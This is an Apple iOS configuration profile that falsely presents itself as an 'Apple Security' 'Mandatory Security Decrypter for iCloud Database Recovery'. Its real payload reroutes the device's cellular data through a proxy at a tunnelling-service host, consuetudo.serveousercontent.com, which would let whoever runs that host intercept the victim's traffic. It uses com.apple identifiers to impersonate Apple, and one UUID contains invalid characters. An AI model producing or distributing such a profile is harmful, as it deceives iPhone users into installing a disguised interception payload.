<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadDescription</key>
            <string>Configures cellular data settings for secure access.</string>
            <key>PayloadDisplayName</key>
            <string>Cellular Security Update</string>
            <key>PayloadIdentifier</key>
            <string>com.apple.cellular.proxy.1</string>
            <key>PayloadType</key>
            <string>com.apple.cellular</string>
            <key>PayloadUUID</key>
            <string>F1E2D3C4-B5A6-9788-7543-A1B2C3D4E5F6</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>APNs</key>
            <array>
                <dict>
                    <key>Name</key>
                    <string>Default</string>
                    <key>ProxyServer</key>
                    <string>consuetudo.serveousercontent.com</string>
                    <key>ProxyServerPort</key>
                    <integer>80</integer>
                </dict>
            </array>
        </dict>
    </array>
    <key>PayloadDescription</key>
    <string>Mandatory Security Decrypter for iCloud Database Recovery.</string>
    <key>PayloadDisplayName</key>
    <string>Hatima Secured Decrypter V3</string>
    <key>PayloadIdentifier</key>
    <string>com.apple.security.verify.v3</string>
    <key>PayloadOrganization</key>
    <string>Apple Security</string>
    <key>PayloadType</key>
    <string>Configuration</string>
    <key>PayloadUUID</key>
    <string>A1B2C3D4-E5F6-7G8H-9I0J-K1L2M3N4O5P6</string>
    <key>PayloadVersion</key>
    <integer>1</integer>
</dict>
</plist>
